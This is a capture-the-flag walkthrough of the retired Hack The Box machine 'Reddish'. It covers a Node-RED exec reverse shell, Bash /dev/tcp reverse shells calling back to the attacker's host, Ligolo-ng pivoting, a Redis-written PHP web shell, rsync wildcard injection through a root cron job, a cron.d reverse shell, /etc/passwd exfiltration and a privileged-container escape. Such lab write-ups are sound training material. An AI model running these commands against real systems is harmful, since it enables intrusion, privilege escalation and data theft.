Skip to content

Reddish

Box details
OS Linux
Difficulty Insane
Status Retired
Release July 2018
Completed September 2025

Enumeration

Started by enumerating the target with Nmap to discover open ports and running services. Only a single open TCP port was discovered:

1
2
3
4
5
6
7
8
$ nmap -sV -sC -p- -PN -oA reddish_nmap 10.10.10.94
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-23 16:06 CEST
Nmap scan report for 10.10.10.94
Host is up (0.066s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
1880/tcp open  http    Node.js Express framework
|_http-title: Error

Scanned the target for common open UDP ports, but found none.

Attempting to navigate to the web server on port 1880 only returns an error message:

alt text

The error message refers to a GET request. Changing the request type to POST returns a JSON object:

$ curl -X POST 10.10.10.94:1880
{"id":"caa395f52cdd8ec38369d4b50d25fe6a","ip":"::ffff:10.10.16.3","path":"/red/{id}"}

The path in the JSON object hints about a possible URL: http://10.10.10.94:1880/red/caa395f52cdd8ec38369d4b50d25fe6a. Navigating to this URL reveals a Node-RED UI:

alt text

Foothold

Node-RED is a framework for visual programming. Through the web UI, functional blocks, called nodes, can be connected together to build application flows that accept external input, execute functions and deliver output.

Among the nodes available in the UI, there is an exec node that allows users to run system commands. The description reads:

Runs a system command and returns its output.

The node can be configured to either wait until the command completes, or to send its output as the command generates it.

The command that is run can be configured in the node or provided by the received message.

This is an obvious candidate for running arbitrary commands on the target. A reverse shell for Node-RED can be found here. Importing it into the web UI produces the following flow:

alt text

Stood up a Netcat listener, deployed the flow and got a call back as root:

1
2
3
4
5
6
$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.10.94 48724

[object Object]id
uid=0(root) gid=0(root) groups=0(root)

Although this is a root shell, it spawned inside a Docker container:

1
2
3
4
5
6
[object Object]ls -la /
total 80
drwxr-xr-x   1 root root 4096 Jul 15  2018 .
drwxr-xr-x   1 root root 4096 Jul 15  2018 ..
-rwxr-xr-x   1 root root    0 May  4  2018 .dockerenv
...

The output from mount shows a few configuration files mounted from the host file system:

1
2
3
4
5
6
[object Object]mount
...
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
...

The container is also dual-homed with network interfaces on both 172.18.0.0/16 and 172.19.0.0/16:

[object Object]ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
13: eth1@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:13:00:03 brd ff:ff:ff:ff:ff:ff
    inet 172.19.0.3/16 brd 172.19.255.255 scope global eth1
       valid_lft forever preferred_lft forever
17: eth0@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0
       valid_lft forever preferred_lft forever

To futher enumerate the container and the network, a better reverse shell is needed. The intitial shell can be upgraded by standing up a new Netcat listener and spawning a Bash shell inside it like so:

[object Object]bash -c "/bin/bash -i >& /dev/tcp/10.10.16.3/9002 0>&1"

Network Enumeration

Over in the new reverse Bash shell, a quick way to enumerate the two networks is by running a ping sweep:

root@nodered:/node-red# for i in {1..254} ;do (ping -c 1 172.18.0.$i | grep "bytes from" &) ;done
< i in {1..254} ;do (ping -c 1 172.18.0.$i | grep "bytes from" &) ;done
64 bytes from 172.18.0.1: icmp_seq=1 ttl=64 time=0.060 ms
64 bytes from 172.18.0.2: icmp_seq=1 ttl=64 time=0.023 ms
root@nodered:/node-red# for i in {1..254} ;do (ping -c 1 172.19.0.$i | grep "bytes from" &) ;done
< i in {1..254} ;do (ping -c 1 172.19.0.$i | grep "bytes from" &) ;done
64 bytes from 172.19.0.1: icmp_seq=1 ttl=64 time=0.067 ms
64 bytes from 172.19.0.2: icmp_seq=1 ttl=64 time=0.040 ms
64 bytes from 172.19.0.3: icmp_seq=1 ttl=64 time=0.019 ms
64 bytes from 172.19.0.4: icmp_seq=1 ttl=64 time=0.082 ms

Not counting the gateway and IP addresses belonging to the current container, two more hosts were discovered on the 172.19.0.0/16 network: 172.19.0.2 and 172.19.0.4.

Without access to a proper network scanner like Nmap, enumerating open ports on the other containers requires a more basic approach. One way of doing it is by writing directly to TCP sockets using Bash. If a port is open, the write will succeed, if not, it will return an error. For instance:

1
2
3
4
5
6
root@nodered:/node-red# echo "test" > /dev/tcp/172.19.0.2/80
echo "test" > /dev/tcp/172.19.0.2/80
bash: connect: Connection refused
bash: /dev/tcp/172.19.0.2/80: Connection refused
root@nodered:/node-red# echo "test" > /dev/tcp/172.19.0.4/80
echo "test" > /dev/tcp/172.19.0.4/80

This can be automated with a simple Bash script:

1
2
3
4
5
for ip in 172.19.0.2 172.19.0.4; do
    for port in $(seq 1 65535); do
        (echo "test" > /dev/tcp/$ip/$port && echo "$ip:$port - open") 2>/dev/null
    done
done

Running the script on the target reveals two open ports, one on each of the two containers:

1
2
3
4
root@nodered:/node-red# for ip in 172.19.0.2 172.19.0.4; do
...
172.19.0.2:6379 - open
172.19.0.4:80 - open

TCP/6379 is the default port for Redis. Given that the second container runs what is likely a web server on port 80, it makes sense that the container on 172.19.0.2 could be the database for it.

As the Node-RED container doesn't have any tools for interacting with the services on the other containers, this has to be done from the attack host through pivoting.

Pivot to the www Container

The web server container (www) is a good place to start. The first step is to decide on a pivoting tool and get it stood up on the attack host and target.

One such pivoting tool is Ligolo-ng. Unlike most pivoting tools, Ligolo-ng works more like a C2 with a central server hosted on the attack host with one or more agents deployed on the pivot hosts. It's also intuitive and relatively easy to manage through both a CLI and web UI.

The limited environment in the container also means that the agent needs to be transferred using only what's available in Bash. Again, using a raw TCP socket, this can be achieved by directing a file to a Netcat listner on the attack host:

  • On the attack host:
    1
    2
    3
    $ nc -lnvp 8000 < agent_linux
    Listening on 0.0.0.0 8000
    Connection received on 10.10.10.94 37770
    
  • On the target:
    root@nodered:/node-red# bash -c "cat < /dev/tcp/10.10.16.3/8000 > agent_linux"
    

Note

While simple to set up, there is no progress feedback and the connection remains open even after the transfer finishes. The only way to make sure the file transferred successfully is to compare the file hashes of the source file and the received file.

Once the server is up, the agent is connected and configured with a route to 172.19.0.0/16. At this point the web server on 172.19.0.4:80 can be accessed directly from the attack host:

alt text

Though the site isn't much to look at, there is an embedded JavaScript script on the page:

...
<script type="text/javascript">
                $(document).ready(function () {
                        incrCounter();
                    getData();
                });

                function getData() {
                    $.ajax({
                        url: "8924d0549008565c554f8128cd11fda4/ajax.php?test=get hits",
                        cache: false,
                        dataType: "text",
                        success: function (data) {
                                    console.log("Number of hits:", data)
                        },
                        error: function () {
                        }
                    });
                }

                function incrCounter() {
                    $.ajax({
                        url: "8924d0549008565c554f8128cd11fda4/ajax.php?test=incr hits",
                        cache: false,
                        dataType: "text",
                        success: function (data) {
                        console.log("HITS incremented:", data);
                        },
                        error: function () {
                        }
                    });
                }

                /*
                    * TODO
                    *
                    * 1. Share the web folder with the database container (Done)
                    * 2. Add here the code to backup databases in /f187a0ec71ce99642e4f0afbd441a68b folder
                    * ...Still don't know how to complete it...
                */
                function backupDatabase() {
                        $.ajax({
                                url: "8924d0549008565c554f8128cd11fda4/ajax.php?backup=...",
                                cache: false,
                                dataType: "text",
                                success: function (data) {
                                    console.log("Database saved:", data);
                                },
                                error: function () {
                                }
                        });
                }
</script>
...

At first glance, the script's purpose appears to be a counter for the number of time the site is visited. There is also a backupDatabase() function for saving the count, which is presumably saved in a database on the other containing running Redis.

The Redis instance can be interacted with using the dedicated redis-cli tool, or simply using Netcat. As the Ligolo-ng tunnel is already set up for the correct network, the container and the Redis instance can be reached by setting the host address to 171.19.0.2:

$ redis-cli -h 172.19.0.2
172.19.0.2:6379> info
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:cce7cc41d26597f7
redis_mode:standalone
os:Linux 4.15.0-213-generic x86_64
...

Tip

As it turns out, the web application running on the other container is a direct interface to the Redis CLI. Passing a Redis command to the test parameter will execute the command on the database backend:

1
2
3
4
5
6
7
8
9
$ curl "http://172.19.0.4/8924d0549008565c554f8128cd11fda4/ajax.php?test=info"
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:cce7cc41d26597f7
redis_mode:standalone
os:Linux 4.15.0-213-generic x86_64
...

As explained in this guide, access to the Redis CLI can be abused to gain RCE by through a simple PHP shell. The only requirement is a web server running PHP, but as mentioned briefly in one of the comments in the web application source code above, the web directory (/var/www/html/8924d0549008565c554f8128cd11fda4) is shared between the database and the web server.

Following the guide above, the web shell is stood up like so:

1
2
3
4
5
6
7
8
9
$ redis-cli -h 172.19.0.2
172.19.0.2:6379> set pwn ";
OK
172.19.0.2:6379> config set dbfilename shell.php
OK
172.19.0.2:6379> config set dir /var/www/html/8924d0549008565c554f8128cd11fda4
OK
172.19.0.2:6379> save
OK

Accessing the shell through the www container confirms RCE:

1
2
3
4
5
 $ curl "http://172.19.0.4/8924d0549008565c554f8128cd11fda4/shell.php?cmd=id" --output -
REDIS0008       redis-ver4.0.9
redis-bits@ctime3used-mem¨

                          aof-preamblepwn"uid=33(www-data) gid=33(www-data) groups=33(www-data)

With RCE in place, the next step is to get a reverse shell on www. However, unlike in the case of the Node-RED container, this container isn't accessible from the attack host. Instead, the solution is to set up a double pivot using the Node-RED container as a proxy for accessing a reverse shell.

The double pivot can be set up with Ligolo-ng by starting an additional TCP listener on the agent running on the Node-RED container. By connecting the other end of the listener to a free port (running Netcat in listener mode) on the attack host, a connection made from the web server using the PHP reverse shell over the listener on the Node-RED container will reach the attack host.

The connection setup at this point can be visualized like so:

alt text

The additional listener on the Node-RED container is stood up using the Ligolo-ng CLI:

1
2
3
4
ligolo-ng » session
? Specify a session : 1 - root@nodered - 10.10.10.94:59016 - 0242ac130003
[Agent : root@nodered] » listener_add --addr 0.0.0.0:9003 --to 127.0.0.1:9003
INFO[49568] Listener 1 created on remote agent!

Note

Ligolo-ng listeners can be set up to either connect back to the Ligolo-ng server (port 11601) for a double pivot, or to an arbitrary TCP/UDP port. In this case, as the server is accessible directly from 172.19.0.3, a direct connection to a TCP port is sufficient.

The reverse shell connection is triggered by sending a POST request to the PHP web shell running on www with the following payload:

bash -c "bash -i >& /dev/tcp/172.19.0.3/9003 0>&1"

This is easiest to achieve using a web proxy:

alt text

Got a call back in the Netcat listener on the attack host as www-data:

www-data@www:/var/www/html/8924d0549008565c554f8128cd11fda4$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation

Repeating the file system enumeration from the Node-RED container, this container also has some file systems mounted from the host, including /home:

1
2
3
4
5
6
7
8
...
/dev/sda2 on /home type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/sda2 on /var/www/html type ext4 (rw,relatime,errors=remount-ro,data=ordered)
...

/home contains two users' home directories:

1
2
3
4
5
6
www-data@www:/$ ls -la /home
drwxr-xr-x 5 root root 4096 Apr  9  2021 .
drwxr-xr-x 1 root root 4096 Jul 15  2018 ..
drwxr-xr-x 2 1001 1001 4096 Jul 16  2018 bergamotto
drwx------ 2 root root 4096 Apr  1  2018 lost+found
drwxr-xr-x 2 1000 1000 4096 Jul 16  2018 somaro

Both directories are readable, though none of them contain anything of value, except the user flag in /home/somaro. Unfortunately, the file itself isn't readable.

Enumerating the / file system, there is a /backup directory containing the following script:

backup.sh

1
2
3
4
5
cd /var/www/html/f187a0ec71ce99642e4f0afbd441a68b
rsync -a *.rdb rsync://backup:873/src/rdb/
cd / && rm -rf /var/www/html/*
rsync -a rsync://backup:873/src/backup/ /var/www/html/
chown www-data. /var/www/html/f187a0ec71ce99642e4f0afbd441a68b

The script is owned by root:root, but isn't executable. Instead, it's being called by a cron job in /etc/cron.d:

1
2
3
4
5
6
7
8
www-data@www:/var/www/html$ ls -l /backup
total 4
-rw-r--r-- 1 root root 242 May  4  2018 backup.sh
www-data@www:/var/www/html$ ls -l /etc/cron.d
total 4
-rw-r--r-- 1 root root 38 May  4  2018 backup
www-data@www:/var/www/html$ cat /etc/cron.d/backup
*/3 * * * * root sh /backup/backup.sh

The script uses rsync to backup Redis database files from /var/www/html/f187a0ec71ce99642e4f0afbd441a68b, but it does so by specifying the target .rdb files with a wildcard and without escaping special characters. The files are backed up to a remote host called backup, but this isn't listed in /etc/hosts. The container also doesn't have any tools like host or dig to query the DNS server for the IP address. A work-around could have been to use ping, but www-data doesn't have the necessary permissions:

www-data@www:/$ ping -c 1 backup
ping: icmp open socket: Operation not permitted

In any case, the way the rsync command is used opens up for abusing the wildcard paramerter. Specifically, running rsync with the -e can be used to execute arbitrary shell commands. This can be extended to running longer commands as well by placing them in a script file with an .rdb extension and trigger them by creating a file on the form -e <script>.pdb. The following example illustrates the idea:

The script can be created on the attack host with a proper editor and saved to something like test.rdb:

1
2
3
4
$ cat test.rdb
#!/bin/sh

touch /tmp/test.txt

Next, it can be transferred to the target by setting up a new Ligolo-ng listener, then hosting the file with Netcat like so:

$ nc -lnvp 9004 < test.rdb
Listening on 0.0.0.0 9004

On the target, the file can be downloaded by reading it from a raw socket:

www-data@www:/var/www/html/f187a0ec71ce99642e4f0afbd441a68b$ cat < /dev/tcp/172.19.0.3/9004 > test.rdb

Once transferred, the empty file needed for rsync is created like so:

www-data@www:/var/www/html/f187a0ec71ce99642e4f0afbd441a68b$ touch -- '-e sh test.rdb'

/tmp/test.txt is created within the three minute window defined in the cron job:

www-data@www:/var/www/html/f187a0ec71ce99642e4f0afbd441a68b$ ls -l /tmp
-rw-r--r-- 1 root     root     0 Sep 24 14:57 test.txt

From here, there are several ways of getting root on www. One way is to stand up yet another reverse shell by replacing the payload above with the following:

1
2
3
$ cat pwn.rdb
#!/bin/sh
bash -c "bash -i >& /dev/tcp/172.19.0.3/9004 0>&1"

Repeated the process above and got a reverse shell as root:

1
2
3
4
5
$ nc -lnvp 9004
Listening on 0.0.0.0 9004
Connection received on 127.0.0.1 48070
root@www:/var/www/html/f187a0ec71ce99642e4f0afbd441a68b# id
uid=0(root) gid=0(root) groups=0(root)

With root access to the container, the user flag in /home/somaro is readable.

Root access also makes it possible to find the backup host's IP address using ping:

1
2
3
4
5
6
7
root@www:~# ping -c 1 backup
PING backup (172.20.0.2) 56(84) bytes of data.
64 bytes from reddish_composition_backup_1.reddish_composition_internal-network-2 (172.20.0.2): icmp_seq=1 ttl=64 time=0.074 ms

--- backup ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.074/0.074/0.074/0.000 ms

Going back to the backup script from earlier, the rsync command can be modified to exfiltrate files from backup. For instance, /etc/passwd is exfiltrated like so:

root@www:~# rsync -avz rsync://backup:873/src/etc/passwd .
receiving incremental file list
passwd

sent 43 bytes  received 543 bytes  390.67 bytes/sec
total size is 1,197  speedup is 2.04
root@www:~# cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false

Note

Note the use of /src/ in the file path above. rsync does not accept relative paths and directory traversal characters.

Pivot to backup

The next step is getting code execution on the backup host. Since this target is only accessible from the www container, this requires yet another pivot and yet another reverse shell. Unlike in the previous case with the reverse shell from www going over the Node-RED container, this setup requires an additional Ligolo-ng agent on www to act as a proxy.

The agent can be transferred to www using Netcat and raw sockets as shown in previous examples. In order to connect the new agent to the Ligolo-ng server on the attack host, a new listener is needed:

[Agent : root@nodered] » listener_add --addr 0.0.0.0:9006 --to 127.0.0.1:11601
INFO[78952] Listener 4 created on remote agent!

Since the goal is to connect the new agent to the Ligolo-ng server, the new listener is connected to Ligolo-ng's listening port (11601). The agent on www is started like so:

1
2
3
root@www:~# ./agent_linux -connect 172.19.0.3:9006 -ignore-cert &
time="2025-09-24T18:04:41Z" level=warning msg="warning, certificate validation disabled"
time="2025-09-24T18:04:41Z" level=info msg="Connection established" addr="172.19.0.3:9006"

The new connection is picked up by the Ligolo-ng server:

[Agent : root@nodered] » INFO[78972] Agent joined.                                
    id=0242ac130004 name=root@www remote="127.0.0.1:45886"

The next step is to set up an interface and route for the new agent on the Ligolo-ng server:

1
2
3
4
5
[Agent : root@nodered] » session
? Specify a session : 2 - root@www - 127.0.0.1:45886 - 0242ac130004
[Agent : root@www] » tunnel_start --tun salmonaustralia
INFO[79733] Starting tunnel to root@www (0242ac130004)
[Agent : root@www] » route_add --name salmonaustralia --route 172.20.0.0/16

With the tunnel up, 172.20.0.2 is directly accessible from the attack host:

1
2
3
4
5
6
7
8
9
$ ping 172.20.0.2
PING 172.20.0.2 (172.20.0.2) 56(84) bytes of data.
64 bytes from 172.20.0.2: icmp_seq=1 ttl=64 time=101 ms
64 bytes from 172.20.0.2: icmp_seq=2 ttl=64 time=104 ms
64 bytes from 172.20.0.2: icmp_seq=3 ttl=64 time=103 ms

--- 172.20.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 101.191/102.832/103.983/1.191 ms

The last step is to set up a listener on the new agent that can connect back to the attack host:

[Agent : root@www] » listener_add --addr 0.0.0.0:9007 --to 127.0.0.1:9007
INFO[81955] Listener 0 created on remote agent!

At this point, the network looks like this:

alt text

A reverse shell is within reach, but the fact that there is no direct way to run commands on backup from www makes this a challenge. The only way around this is to leverage rsync to set up a cron job on backup and wait for it to trigger.

The cron job is simple enough:

echo '* * * * * root bash -c "bash -i >& /dev/tcp/172.20.0.3/9007 0>&1"' > revshell

The file can be transferred to backup with rsync:

root@www:~#  rsync revshell rsync://backup:873/src/etc/cron.d/revshell

Got a callback in a Netcat listener as root:

1
2
3
4
5
$ nc -lnvp 9007
Listening on 0.0.0.0 9007
Connection received on 127.0.0.1 36624
root@backup:~# id
uid=0(root) gid=0(root) groups=0(root)

Privilege Escalation (root)

Similar to the containers encountered earlier, backup also has several active mounts on /dev/sda2:

1
2
3
4
5
6
root@backup:~# mount
...
/dev/sda2 on /backup type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)

/backup doesn't appear to have anything of interest:

1
2
3
4
5
6
7
root@backup:~# ls -l /backup
total 20
drwxr-xr-x 3 root root 4096 Jul 15  2018 8924d0549008565c554f8128cd11fda4
drwxr-xr-x 2 root root 4096 Jul 15  2018 assets
drwxr-xr-x 2 root root 4096 Jul 15  2018 f187a0ec71ce99642e4f0afbd441a68b
-rw-r--r-- 1 root root 2023 May  4  2018 index.html
-rw-r--r-- 1 root root   17 May  4  2018 info.php

However, having /dev/sda2 mounted directly to /backup may be a hint that the container is privileged and is allowed to mount directories from the host. Assuming / on the host is on /dev/sda2, mounting it to /mnt should only succeed if this is the case:

root@backup:~# mount /dev/sda2 /mnt
root@backup:~# ls -la /mnt
total 128
drwxr-xr-x  23 root root  4096 Dec  6  2023 .
drwxr-xr-x   1 root root  4096 Jul 15  2018 ..
drwxr-xr-x   2 root root 12288 Dec  6  2023 bin
drwxr-xr-x   2 root root  4096 Jul 15  2018 boot
drwxr-xr-x   4 root root  4096 Jul 15  2018 dev
drwxr-xr-x 100 root root 12288 Dec  6  2023 etc
drwxr-xr-x   5 root root  4096 Apr  9  2021 home
...

No /.dockerenv confirms that /mnt is actually the root file system on the host, which also means:

1
2
3
root@backup:~# ls -l /mnt/root
total 4
-r-------- 1 root root 33 Sep 23 14:05 root.txt

Got the root flag.